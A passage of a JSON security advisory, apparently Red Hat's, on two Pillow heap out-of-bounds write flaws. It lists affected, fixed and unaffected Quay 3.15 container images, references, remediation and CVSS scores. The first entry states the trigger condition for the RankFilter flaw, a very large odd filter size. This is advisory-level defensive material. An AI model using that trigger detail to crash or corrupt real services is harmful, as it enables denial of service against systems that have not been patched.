"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
},
{
"cve": "CVE-2026-59199",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-07-14T17:02:51.371888+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500061"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit a vulnerability in the library\u0027s image processing functions, specifically when handling image coordinates near certain limits. This flaw, a native heap out-of-bounds write, could lead to a denial of service (DoS), making the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Denial of Service via out-of-bounds write in image processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The impact is limited to denial of service. While the underlying issue is a heap out-of-bounds write, it does not provide a controlled write primitive exploitable for code execution in affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59199"
},
{
"category": "external",
"summary": "RHBZ#2500061",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500061"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59199",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59199"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59199",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59199"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/ceefc348eb3c3844c7f9796ef2cc3a7dd5fbba7b",
"url": "https://github.com/python-pillow/Pillow/commit/ceefc348eb3c3844c7f9796ef2cc3a7dd5fbba7b"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9703",
"url": "https://github.com/python-pillow/Pillow/pull/9703"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-6r8x-57c9-28j4",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-6r8x-57c9-28j4"
}
],
"release_date": "2026-07-14T15:42:15.071000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
